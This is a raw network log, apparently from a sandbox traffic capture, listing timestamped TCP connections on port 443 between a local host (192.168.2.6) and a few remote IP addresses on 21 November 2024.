                                                                                                                                                                              Nov 21, 2024 08:30:55.607373953 CET49823443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:55.607424021 CET49823443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:55.620759010 CET4434982313.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:55.620804071 CET4434982313.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:55.620910883 CET49823443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:55.620910883 CET49823443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:55.620939016 CET4434982313.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:55.621087074 CET49823443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:55.623056889 CET4434982313.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:55.623223066 CET4434982313.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:55.623255968 CET49823443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:55.623265982 CET4434982313.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:55.636321068 CET4434982713.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:55.636492968 CET4434982713.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:55.637020111 CET49827443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:55.638432026 CET49827443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:55.638432026 CET49827443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:55.638451099 CET4434982713.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:55.638462067 CET4434982713.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:55.645092964 CET49835443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:55.645138025 CET4434983513.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:55.649192095 CET49835443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:55.649313927 CET49835443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:55.649324894 CET4434983513.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:55.679783106 CET4434982613.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:55.682904005 CET4434982613.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:55.683017015 CET49826443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:55.683017015 CET49826443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:55.683062077 CET49826443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:55.683084011 CET4434982613.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:55.689095020 CET49838443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:55.689136028 CET4434983813.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:55.690248966 CET49838443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:55.690530062 CET49838443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:55.690566063 CET4434983813.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:55.827338934 CET4434982313.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:55.827567101 CET49823443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:56.221802950 CET4434982913.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:56.272759914 CET49829443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:56.295811892 CET4434983013.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:56.344703913 CET49830443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:56.420437098 CET49829443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:56.420468092 CET4434982913.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:56.420932055 CET49829443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:56.420938969 CET4434982913.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:56.421560049 CET49830443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:56.421575069 CET4434983013.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:56.422090054 CET49830443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:56.422096968 CET4434983013.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:56.744615078 CET4434983013.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:56.747668982 CET4434983013.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:56.747761965 CET49830443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:56.747895002 CET49830443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:56.747941971 CET4434983013.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:56.747972012 CET49830443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:56.747988939 CET4434983013.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:56.752969980 CET49839443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:56.753017902 CET4434983913.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:56.753171921 CET49839443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:56.753314018 CET49839443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:56.753325939 CET4434983913.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:56.755389929 CET4434982913.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:56.758485079 CET4434982913.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:56.758591890 CET49829443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:56.758630037 CET49829443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:56.758630037 CET49829443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:56.758649111 CET4434982913.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:56.758657932 CET4434982913.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:56.760637999 CET49840443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:56.760670900 CET4434984013.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:56.760926962 CET49840443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:56.761043072 CET49840443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:56.761054993 CET4434984013.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:57.109230995 CET4434983313.107.246.42192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:57.109894991 CET49833443192.168.2.613.107.246.42
                                                                                                                                                                              Nov 21, 2024 08:30:57.109908104 CET4434983313.107.246.42192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:57.111385107 CET4434983313.107.246.42192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:57.111459970 CET49833443192.168.2.613.107.246.42
                                                                                                                                                                              Nov 21, 2024 08:30:57.112417936 CET49833443192.168.2.613.107.246.42
                                                                                                                                                                              Nov 21, 2024 08:30:57.112518072 CET4434983313.107.246.42192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:57.118496895 CET49833443192.168.2.613.107.246.42
                                                                                                                                                                              Nov 21, 2024 08:30:57.118505955 CET4434983313.107.246.42192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:57.169218063 CET49833443192.168.2.613.107.246.42
                                                                                                                                                                              Nov 21, 2024 08:30:57.237087011 CET4434983413.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:57.237781048 CET49834443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:57.237828016 CET4434983413.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:57.238148928 CET49834443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:57.238157988 CET4434983413.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:57.406543970 CET4434983813.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:57.423891068 CET49838443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:57.423963070 CET4434983813.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:57.424964905 CET49838443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:57.424981117 CET4434983813.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:57.430782080 CET4434983513.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:57.431330919 CET49835443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:57.431349039 CET4434983513.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:57.432018995 CET49835443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:57.432027102 CET4434983513.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:57.614202023 CET4434983313.107.246.42192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:57.614228964 CET4434983313.107.246.42192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:57.614238024 CET4434983313.107.246.42192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:57.614255905 CET4434983313.107.246.42192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:57.614264965 CET4434983313.107.246.42192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:57.614272118 CET4434983313.107.246.42192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:57.614330053 CET49833443192.168.2.613.107.246.42
                                                                                                                                                                              Nov 21, 2024 08:30:57.614330053 CET49833443192.168.2.613.107.246.42
                                                                                                                                                                              Nov 21, 2024 08:30:57.614346027 CET4434983313.107.246.42192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:57.614437103 CET49833443192.168.2.613.107.246.42
                                                                                                                                                                              Nov 21, 2024 08:30:57.689135075 CET4434983413.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:57.692693949 CET4434983413.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:57.692749977 CET49834443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:57.692826986 CET49834443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:57.692847013 CET4434983413.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:57.692862034 CET49834443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:57.692868948 CET4434983413.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:57.695657015 CET49842443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:57.695693016 CET4434984213.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:57.695759058 CET49842443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:57.695883036 CET49842443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:57.695916891 CET4434984213.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:57.794965982 CET4434983313.107.246.42192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:57.794996977 CET4434983313.107.246.42192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:57.795105934 CET49833443192.168.2.613.107.246.42
                                                                                                                                                                              Nov 21, 2024 08:30:57.795105934 CET49833443192.168.2.613.107.246.42
                                                                                                                                                                              Nov 21, 2024 08:30:57.795118093 CET4434983313.107.246.42192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:57.795170069 CET49833443192.168.2.613.107.246.42
                                                                                                                                                                              Nov 21, 2024 08:30:57.842586994 CET4434983813.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:57.844482899 CET4434983813.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:57.844575882 CET49838443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:57.844712019 CET49838443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:57.844738007 CET4434983813.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:57.844753981 CET49838443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:57.844763041 CET4434983813.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:57.848058939 CET49845443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:57.848088026 CET4434984513.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:57.848908901 CET49845443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:57.849057913 CET49845443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:57.849076033 CET4434984513.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:57.873897076 CET4434983313.107.246.42192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:57.873917103 CET4434983313.107.246.42192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:57.874108076 CET49833443192.168.2.613.107.246.42
                                                                                                                                                                              Nov 21, 2024 08:30:57.874121904 CET4434983313.107.246.42192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:57.874183893 CET49833443192.168.2.613.107.246.42
                                                                                                                                                                              Nov 21, 2024 08:30:57.877270937 CET4434983313.107.246.42192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:57.877331018 CET49833443192.168.2.613.107.246.42
                                                                                                                                                                              Nov 21, 2024 08:30:57.877337933 CET4434983313.107.246.42192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:57.877362967 CET4434983313.107.246.42192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:57.877372026 CET49833443192.168.2.613.107.246.42
                                                                                                                                                                              Nov 21, 2024 08:30:57.877445936 CET49833443192.168.2.613.107.246.42
                                                                                                                                                                              Nov 21, 2024 08:30:57.879673958 CET49833443192.168.2.613.107.246.42
                                                                                                                                                                              Nov 21, 2024 08:30:57.879682064 CET4434983313.107.246.42192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:57.917624950 CET4434983513.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:57.917778969 CET4434983513.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:57.917855024 CET49835443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:57.918999910 CET49835443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:57.919018984 CET4434983513.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:57.919029951 CET49835443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:57.919034958 CET4434983513.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:57.921644926 CET49846443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:57.921725035 CET4434984613.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:57.921806097 CET49846443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:57.922224998 CET49846443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:57.922256947 CET4434984613.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:58.568896055 CET4434984013.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:58.570249081 CET49840443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:58.570278883 CET4434984013.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:58.571113110 CET49840443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:58.571118116 CET4434984013.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:58.604444027 CET4434983913.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:58.605015039 CET49839443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:58.605104923 CET4434983913.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:58.605711937 CET49839443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:58.605726957 CET4434983913.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:59.298000097 CET4434983913.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:59.298078060 CET4434983913.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:59.298151970 CET49839443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:59.298152924 CET4434984013.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:59.298321962 CET4434984013.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:59.298512936 CET49840443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:59.299195051 CET49839443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:59.299218893 CET4434983913.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:59.299523115 CET49839443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:59.299531937 CET4434983913.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:59.302539110 CET49840443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:59.302556992 CET4434984013.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:59.302570105 CET49840443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:59.302577019 CET4434984013.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:59.311331987 CET49849443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:59.311353922 CET4434984913.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:59.311471939 CET49849443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:59.311671019 CET49850443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:59.311713934 CET4434985013.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:59.311769962 CET49850443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:59.311883926 CET49849443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:59.311887980 CET49850443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:59.311893940 CET4434984913.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:59.311901093 CET4434985013.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:59.816642046 CET4434984513.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:59.817435980 CET49845443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:59.817482948 CET4434984513.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:59.818006039 CET49845443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:59.818012953 CET4434984513.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:59.840245008 CET4434984213.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:59.840831995 CET49842443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:59.840867043 CET4434984213.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:59.841315985 CET49842443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:59.841320038 CET4434984213.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:59.855704069 CET4434984613.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:59.856519938 CET49846443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:59.856623888 CET4434984613.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:30:59.857445002 CET49846443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:30:59.857479095 CET4434984613.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:00.250837088 CET4434984513.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:00.253938913 CET4434984513.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:00.253984928 CET4434984513.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:00.254096985 CET49845443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:00.265774012 CET49845443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:00.265811920 CET4434984513.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:00.265830040 CET49845443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:00.265839100 CET4434984513.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:00.269300938 CET49858443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:00.269393921 CET4434985813.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:00.269483089 CET49858443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:00.270118952 CET49858443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:00.270155907 CET4434985813.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:00.283268929 CET4434984213.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:00.286323071 CET4434984213.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:00.288448095 CET49842443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:00.288932085 CET49842443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:00.288948059 CET4434984213.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:00.288959980 CET49842443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:00.288964987 CET4434984213.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:00.291301966 CET49860443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:00.291328907 CET4434986013.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:00.291390896 CET49860443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:00.291671038 CET49860443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:00.291687012 CET4434986013.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:00.308446884 CET4434984613.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:00.311480045 CET4434984613.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:00.313158989 CET49846443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:00.313221931 CET49846443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:00.313247919 CET4434984613.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:00.313262939 CET49846443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:00.313271046 CET4434984613.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:00.316282988 CET49861443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:00.316314936 CET4434986113.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:00.316400051 CET49861443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:00.316540003 CET49861443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:00.316577911 CET4434986113.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:01.091201067 CET4434985013.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:01.091861010 CET49850443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:01.091903925 CET4434985013.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:01.092437983 CET49850443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:01.092444897 CET4434985013.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:01.157676935 CET4434984913.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:01.159810066 CET49849443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:01.159856081 CET4434984913.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:01.160346985 CET49849443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:01.160353899 CET4434984913.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:01.257126093 CET44349812142.250.185.228192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:01.257214069 CET44349812142.250.185.228192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:01.257270098 CET49812443192.168.2.6142.250.185.228
                                                                                                                                                                              Nov 21, 2024 08:31:01.535516024 CET4434985013.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:01.538578033 CET4434985013.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:01.538680077 CET49850443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:01.552031994 CET49850443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:01.552031994 CET49850443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:01.552071095 CET4434985013.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:01.552083969 CET4434985013.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:01.587867022 CET49863443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:01.587912083 CET4434986313.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:01.587999105 CET49863443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:01.599911928 CET49863443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:01.599925995 CET4434986313.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:01.616450071 CET4434984913.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:01.619338989 CET4434984913.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:01.619400978 CET49849443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:01.619421959 CET4434984913.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:01.619442940 CET4434984913.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:01.619497061 CET49849443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:01.644207001 CET49849443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:01.644254923 CET4434984913.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:01.644273996 CET49849443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:01.644280910 CET4434984913.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:01.653846979 CET49864443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:01.653892040 CET4434986413.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:01.653960943 CET49864443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:01.654298067 CET49864443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:01.654313087 CET4434986413.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:01.818712950 CET49812443192.168.2.6142.250.185.228
                                                                                                                                                                              Nov 21, 2024 08:31:01.818737984 CET44349812142.250.185.228192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:02.101455927 CET4434986113.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:02.101979971 CET49861443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:02.102005005 CET4434986113.107.246.45192.168.2.6
                                                                                                                                                                              Nov 21, 2024 08:31:02.102473021 CET49861443192.168.2.613.107.246.45
                                                                                                                                                                              Nov 21, 2024 08:31:02.102478027 CET4434986113.107.246.45192.168.2.6
